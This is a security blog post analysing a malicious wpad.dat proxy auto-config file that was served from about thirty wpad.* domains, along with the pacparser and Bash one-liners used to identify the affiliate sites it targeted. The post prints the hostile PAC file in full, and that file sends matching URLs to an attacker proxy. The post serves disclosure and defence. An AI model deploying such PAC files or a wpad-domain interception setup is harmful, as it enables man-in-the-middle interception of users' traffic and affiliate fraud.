BadWPAD and wpad.pl / wpadblocking.com case (part 2)

blog.redteam.pl, 5 years ago
In this second part of the recently published blog post “BadWPAD, DNS suffix and wpad.pl / wpadblocking.com case” [https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html] I would like to focus on the analysis of the (bad)WPAD file which was served by wpadblocking.com. The analyzed case included the following wpad.* TLDs, which we were able to link to this project:

wpad.cat
wpad.cc
wpad.computer
wpad.cz (Czech Republic)
wpad.direct
wpad.domains
wpad.ee (Estonia)
wpad.gr (Greece)
wpad.group
wpad.hr (Croatia)
wpad.im
wpad.info
wpad.it (Italy)
wpad.live
wpad.ltd
wpad.lv (Latvia)
wpad.name
wpad.network
wpad.pl (Poland)
wpad.plus
wpad.pro
wpad.sk (Slovakia)
wpad.systems
wpad.tv
wpad.tw (Taiwan)
wpad.vip
wpad.ws
wpad.xxx
wpad.zone

All of the above domains point to the same malicious IP address, 144.76.184.43.

As a short reminder, here is the most crucial information from the first part about WPAD and the BadWPAD attack:

Windows (including Windows 10) commonly has the Web Proxy Auto-Discovery Protocol (WPAD) enabled by default. Quoting Wikipedia, this is a “method used by clients to locate the URL of a configuration file using DHCP and/or DNS discovery methods. Once detection and download of the configuration file is complete, it can be executed to determine the proxy for a specified URL”. If the DNS suffix is set to awesome.redteam.pl, Windows requests the wpad.dat file from WPAD servers until a server responds with the file. It tries the following URLs within the domain in turn:
1. http://wpad.awesome.redteam.pl/wpad.dat
2. http://wpad.redteam.pl/wpad.dat
3. http://wpad.pl/wpad.dat
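
The lookup order above can be reproduced with a few lines of Python. This is a minimal sketch that only mirrors the three URLs listed above; the function name wpad_candidates is ours, and the sketch ignores DHCP-based discovery and any resolver-specific rules in Windows.

```python
def wpad_candidates(dns_suffix):
    """Return the wpad.dat URLs tried for a DNS suffix, most specific first."""
    labels = dns_suffix.strip(".").split(".")
    urls = []
    # Drop the leftmost label one step at a time: a.b.c -> b.c -> c
    for i in range(len(labels)):
        urls.append("http://wpad." + ".".join(labels[i:]) + "/wpad.dat")
    return urls


for url in wpad_candidates("awesome.redteam.pl"):
    print(url)
```

The last URL printed is the one that leaves the organisation entirely, which is why whoever controls wpad.pl receives the request.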

Now we can see how powerful it can be to own wpad.* TLDs, especially national TLDs such as wpad.cz (Czech Republic), wpad.ee (Estonia), wpad.gr (Greece), wpad.hr (Croatia), wpad.it (Italy), wpad.lv (Latvia), wpad.pl (Poland) and wpad.sk (Slovakia). For all of these and the other wpad.* TLDs listed at the beginning of this blog post, wpadblocking.com used the following malicious WPAD file [http://web.archive.org/web/20160316084421/http://wpad.pl/wpad.dat]:

// WpadBlock.com project
// Testing regular expressions
function FindProxyForURL(url, host) {
if( ( shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*") ) || ( shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*") ) || ( shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*") ) || ( shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*") ) || ( ( shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*") ) ) || ( shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*") ) || ( shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*") ) || ( shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*")) ) || ( shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*") ) || ( shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*") ) || ( shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*") ) ) return "PROXY 144.76.184.43:80";
return "DIRECT";
}

It was described as “testing regular expressions”, but in fact this was a deliberate man-in-the-middle (MITM) attack whose most likely intent was to modify the referrer IDs of affiliate programs so that the malicious actor could earn money. We say “most likely” because the only proof we have is that they forwarded requests related to affiliate programs over their proxy. We don’t know exactly what ran on the server side, but we can presume it with high probability based on the facts shown below.

In the first blog post related to this case we already found that they catch Booking.com affiliate program URLs [https://blog.redteam.pl/2019/05/badwpad-dns-suffix-wpad-wpadblocking-com.html].

I didn’t want to rewrite any of the original JavaScript regexps (regular expressions) [https://en.wikipedia.org/wiki/Regular_expression#Perl_and_PCRE], as this could change the way strings are matched, so the pacparser [https://github.com/manugarg/pacparser] library was used.

The first task was to make the file more readable, so each condition that returned the malicious proxy was moved to a separate line:

(shExpMatch(url, "*//s?clic??a*pres?.c*/e/*") && !shExpMatch(url, "*aQNVZ?AU*")) ||
(shExpMatch(url, "*:/?e?or?.?w/*") && !shExpMatch(url, "*OZ?2?*")) ||
(shExpMatch(url, "*t*p:*sh*u*.t*te*eg*st*r") && !shExpMatch(url, "*new*") && !shExpMatch(url, "*ac*ru*s*")) ||
(shExpMatch(url, "h?t*/*w.b?*k?ng.c*m/*aid*") && !shExpMatch(url, "*3646?2*") && !shExpMatch(url, "*/aclk*") && !shExpMatch(url, "*noredir*") && !shExpMatch(url, "*gclid*")) ||
(shExpMatch(url, "*ttp:/*w?pl*s5?0.*/") || shExpMatch(url, "ht*w?pl*s5?0.*/*id=*")) ||
(shExpMatch(url, "*w?ce?*o.p?/C*ent*js*bun*e/b*/js*")) ||
(shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*")) ||
(shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*"))) ||
(shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*")) ||
(shExpMatch(url, "*p://af?.?pti*ar?.c??/*") && !shExpMatch(url, "*8?67*")) ||
(shExpMatch(url, "*p:*/w*.co?p*ial?a*ann?r*p*ef*") && !shExpMatch(url, "*75?6*6*"))

One of the most crucial tasks was to modify all regexps so that they catch only domains, not full URLs, because the only feasible brute-force-like approach was to test these regexps against lists of domains, e.g. from AdBlock, Alexa, DNS zones etc. During the analysis it turned out that none of the regexps is restricted to the HTTPS protocol (https://), while all of them can match HTTP URLs (http://). For our approach it wasn’t important what comes after the domain, as we wanted to find the domains targeted by the MITM attack in general, so everything in the URL after the domain (/) was removed. The same was done with subdomains, as they would have made it much harder to find targets. After the modifications we ended up with the following regexps:

(shExpMatch(url, "*//s?clic??a*pres?.c*/*")) ||
(shExpMatch(url, "*:/?e?or?.?w/*")) ||
(shExpMatch(url, "*t*p:*t*te*eg*st*r*")) ||
(shExpMatch(url, "h?t*/*b?*k?ng.c*m/*")) ||
((shExpMatch(url, "*ttp:/*w?pl*s5?0.*/*") || shExpMatch(url, "ht*w?pl*s5?0.*/*"))) ||
(shExpMatch(url, "*w?ce?*o.p?/*")) ||
(shExpMatch(url, "*be*-*-ho*.c*/*")) ||
(shExpMatch(url, "*hr??*hot*?do*off*")) ||
(shExpMatch(url, "*tt*/*s*le?m*i?.p?/*")) ||
(shExpMatch(url, "*p://*?pti*ar?.c??/*")) ||
(shExpMatch(url, "*p:*/*co?p*ial?a*ann?r*p*ef*"))
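
To illustrate why this simplification was needed, here is a small sketch that compares the original and the simplified Booking.com pattern against a bare domain URL. It does not use pacparser: Python's fnmatch.fnmatchcase is used as a stand-in for shExpMatch, on the assumption that only the * and ? wildcards matter here (none of the patterns contain brackets). The helper name sh_exp_match is ours.

```python
from fnmatch import fnmatchcase


def sh_exp_match(url, pattern):
    # Stand-in for the PAC helper: '*' matches any run of characters,
    # '?' matches exactly one character, the whole string must match.
    return fnmatchcase(url, pattern)


ORIGINAL = "h?t*/*w.b?*k?ng.c*m/*aid*"   # as served in wpad.dat
SIMPLIFIED = "h?t*/*b?*k?ng.c*m/*"       # subdomain and path removed

url = "http://booking.com/"  # the kind of URL built from a plain domain list

print(sh_exp_match(url, ORIGINAL))    # False: no "w." subdomain, no "aid"
print(sh_exp_match(url, SIMPLIFIED))  # True
```

With the original pattern a domain list would never produce a hit, because list entries carry neither the affiliate parameter nor the subdomain.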

General usage of the pacparser Python library looks as follows. Suppose we have a wpad.dat file like:

function FindProxyForURL(url, host) {
if(shExpMatch(url, "*be*-*-ho*.c*")) return "PROXY 144.76.184.43:80";
return "DIRECT";
}

We can parse it and test URLs against these conditions:

$ python3
Python 3.6.5 (default, Apr 1 2018, 05:46:30)
[GCC 7.3.0] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> import pacparser
>>> pacparser.init()
>>> pacparser.parse_pac('wpad.dat')
>>> pacparser.find_proxy('https://www.bet-at-home.com');
'PROXY 144.76.184.43:80'

To automate the whole approach we used a Python one-liner combined with a Bash one-liner:

$ echo -n http://www.bet-at-home.com | python3 -c "import sys;import pacparser;pacparser.init();pacparser.parse_pac('wpad.dat');print(pacparser.find_proxy(sys.stdin.read()));"
PROXY 144.76.184.43:80

The complete script was similar to this:

$ for domain in $(cat domains.txt);do echo -n http://$domain/ | python3 -c "import sys;input=sys.stdin.read();import pacparser;pacparser.init();pacparser.parse_pac('wpad.dat');print(input,pacparser.find_proxy(input));";done

We started our analysis using the .com zone, but with over 140 million domains it generated quite a few false positives, so we ended up using the Alexa top 1 million sites [http://s3.amazonaws.com/alexa-static/top-1m.csv.zip].
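
The shell loop starts a new Python process and re-parses wpad.dat for every domain. A possible single-process variant is sketched below. It is not the script we ran: the function names (read_alexa_domains, to_url, scan, scan_file) are ours, the input is assumed to be in the "rank,domain" layout of top-1m.csv, and the pacparser calls are limited to init, parse_pac, find_proxy and cleanup.

```python
import csv


def read_alexa_domains(lines):
    """Yield the domain column from 'rank,domain' rows."""
    for row in csv.reader(lines):
        if len(row) == 2:
            yield row[1].strip()


def to_url(domain):
    # Same URL shape as in the shell loop: http://<domain>/
    return "http://" + domain + "/"


def scan(pac_path, domains):
    """Return (url, result) pairs for every domain that is not sent DIRECT."""
    import pacparser  # imported lazily; requires the pacparser Python module

    pacparser.init()
    pacparser.parse_pac(pac_path)  # same call as in the interactive session
    hits = []
    try:
        for domain in domains:
            url = to_url(domain)
            result = pacparser.find_proxy(url)
            if result != "DIRECT":
                hits.append((url, result))
    finally:
        pacparser.cleanup()
    return hits


def scan_file(csv_path, pac_path):
    """Scan a whole 'rank,domain' CSV file against one PAC file."""
    with open(csv_path, newline="") as handle:
        return scan(pac_path, read_alexa_domains(handle))
```

Calling scan_file("top-1m.csv", "wpad.dat") would then return only the domains routed through the proxy, which keeps the output short enough to review by hand.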

We found that the following condition:

(shExpMatch(url, "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*") && !shExpMatch(url, "*a_7?59?b*")) ||

is related to the bet-at-home.com affiliate program.

Affiliate program URLs of this kind can be found in Google results, so consider the regexp:

*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*

Compare it to an example URL:

https://affiliates.bet-at-home.com/processing/clickthrgh.asp?btag=a_59828b_23825

The second part of this condition matches the malicious actor’s own affiliate program ID and is therefore negated (it begins with !).
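
The whole condition can be checked against the example URL with a short sketch. As an assumption, fnmatch.fnmatchcase stands in for shExpMatch (only * and ? are used in these patterns), and the helper is_proxied is ours. The second URL is hypothetical: its btag value is invented purely so that it fits the negated pattern.

```python
from fnmatch import fnmatchcase


def is_proxied(url, match, excludes):
    """True when url fits the match glob and none of the negated globs."""
    if not fnmatchcase(url, match):
        return False
    return not any(fnmatchcase(url, pattern) for pattern in excludes)


MATCH = "*t*ff?l*.be*-*-ho*.c*/p*ss*/*.as*bta*a_*"
EXCLUDES = ["*a_7?59?b*"]

example = ("https://affiliates.bet-at-home.com/processing/"
           "clickthrgh.asp?btag=a_59828b_23825")
# Hypothetical URL: the btag value is invented only to fit the negated glob.
excluded = ("http://affiliates.bet-at-home.com/processing/"
            "clickthrgh.asp?btag=a_70590b_1")

print(is_proxied(example, MATCH, EXCLUDES))   # True
print(is_proxied(excluded, MATCH, EXCLUDES))  # False
```

In other words, every affiliate link is sent through the proxy except links that already carry an ID fitting the negated pattern.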

Another affiliate program found this way was salesmedia.pl:

(shExpMatch(url, "*tt*/g?.s*le?m*i?.p?/*_*=*") && !shExpMatch(url, "*d=1?90*")) ||

[Screenshot: example Google results with affiliate program URLs]

Regexp condition:

*tt*/g?.s*le?m*i?.p?/*_*=*

Example affiliate program URL from Google results:

http://go.salesmedia.pl/aff_c?offer_id=1062&aff_id=8502&url=...

As above, the second part of this condition matches the malicious actor’s affiliate program ID (aff_id=) and is therefore negated (it begins with !):

!shExpMatch(url, "*d=1?90*")
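
To see which query parameter the negated pattern reacts to, the URL can be split into its name=value pairs. This is only a sketch: fnmatch.fnmatchcase stands in for shExpMatch, the helper params_hitting_negation is ours, and the second URL uses an invented aff_id chosen solely to fit the 1?90 wildcard.

```python
from fnmatch import fnmatchcase
from urllib.parse import parse_qsl, urlsplit

NEGATED = "*d=1?90*"


def params_hitting_negation(url, negated=NEGATED):
    """Names of query parameters whose 'name=value' text fits the glob."""
    query = urlsplit(url).query
    return [name for name, value in parse_qsl(query)
            if fnmatchcase(name + "=" + value, negated)]


example = "http://go.salesmedia.pl/aff_c?offer_id=1062&aff_id=8502&url=..."
# Hypothetical URL: aff_id=1090 is invented only to fit the glob 1?90.
excluded = "http://go.salesmedia.pl/aff_c?offer_id=1062&aff_id=1090"

print(params_hitting_negation(example))   # []
print(params_hitting_negation(excluded))  # ['aff_id']
```

Note that the pattern itself only requires a parameter name ending in “d”, so reading it as aff_id is an interpretation based on the example URL.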

The last case where we found an affiliate program was slightly different and was based on analysis of the regexps:

(shExpMatch(url, "*.?rs?c?m/??/") || shExpMatch(url, "*.?rs?d??we?3/") || shExpMatch(url, "*.?rs?c?m/we?3/") || (shExpMatch(url, "*.hr??*hot*?do*off*") && !shExpMatch(url, "*10?35?2?39*"))) ||

Only the last part of this condition is negated (!), most likely because, as before, it matches the affiliate program ID of the malicious actor.

When we take a look at the first part of the condition:

shExpMatch(url, "*.?rs?c?m/??/") ||

There is a dot, then one unknown character, then the two known characters “rs”, then one unknown character, “c”, one unknown character, “m” and “/”. This most likely means “*.?rs.com/”: the “/” character marks the end of the domain, and since the third position before “/” is not a dot (which would indicate a two-letter national TLD), the TLD is “.com”, I would guess with 99.99% probability.

Grepping the Alexa top 1 million sites with the regexp rewritten for grep in Bash matched the following domain:

$ grep ",.rs\.com$" top-1m.csv | head -1
48246,hrs.com
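
The same search can be done without first guessing the TLD, by applying the host part of the pattern directly to each domain. The sketch below assumes fnmatch.fnmatchcase as a stand-in for shExpMatch; the helper fits_host_glob is ours, and apart from the hrs.com row taken from the grep output above, the sample rows are invented placeholders in the same "rank,domain" layout.

```python
from fnmatch import fnmatchcase

HOST_GLOB = "*.?rs?c?m/"  # host part of "*.?rs?c?m/??/", path removed


def fits_host_glob(domain):
    # Prefix a dot so that a bare domain can satisfy the leading "." of the glob.
    return fnmatchcase("." + domain + "/", HOST_GLOB)


# Only the hrs.com row is real; the other rows are invented placeholders.
rows = ["1,example.com", "2,cars.com", "48246,hrs.com", "3,hrs.co.uk"]
domains = [row.split(",", 1)[1] for row in rows]
matches = [domain for domain in domains if fits_host_glob(domain)]
print(matches)  # ['hrs.com']
```

This variant is slower than grep on a million rows, but it avoids hand-translating the wildcard into a regular expression.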

[Screenshot: example Google results]

Example URL:

http://www.hrs.com/web3/?client=pl__hrspartner&customerId=1043522679

Its host and path (http://www.hrs.com/web3/) match the regexp condition:

shExpMatch(url, "*.?rs?c?m/we?3/")

All of the above proves that it indeed wasn’t a “regular expression test” but a carefully prepared badWPAD attack designed to catch affiliate program URLs and, with high probability, modify them on the server side via the malicious proxy, changing the referral IDs to earn money that way.

We should never put trust in such (private) projects unless they are run by credible organisations, such as CERTs with jurisdiction over the TLDs in question. Why do other anti-BadWPAD projects which own wpad.* TLDs point them to 127.0.0.0/8 (localhost), while wpadblocking.com does not? Forwarding traffic over their own proxy clearly suggests malicious intent.

Keep in mind that they _only_ perform MITM on affiliate programs. What if these wpad.dat files are changed the next day to catch all .exe files and replace them via the proxy with crypto malware? Well, it’s gonna be very bad, and the scale of the problem will become very large in a short time. This is the main reason why all wpad.* TLDs should be sinkholed by CERTs, especially the ones owned by the wpadblocking.com project and listed above. Please also note that they served malicious content via the badWPAD attack for over 10 years (!).
